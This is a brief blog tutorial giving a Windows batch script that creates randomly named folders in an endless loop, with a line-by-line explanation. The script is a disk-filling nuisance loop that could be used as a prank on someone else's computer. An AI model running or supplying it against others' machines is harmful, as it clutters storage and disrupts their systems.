How To Create Infinite Folders On Windows

Open a Notepad and copy this code to Notepad.

@echo off
:top
md %random%
goto top
 @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top , infinite loop
Save the file with .bat extension(for eg: folderscreate.bat)

That’s all if you double click the file it will create a finite folder wherever the batch file is.

Popular posts from this blog

How To Flash China Tablets (Easy Method)

How To Create A Hidden Service On Tor Using Android With Termux

How To Create And Configure Sudo User On Arch Linux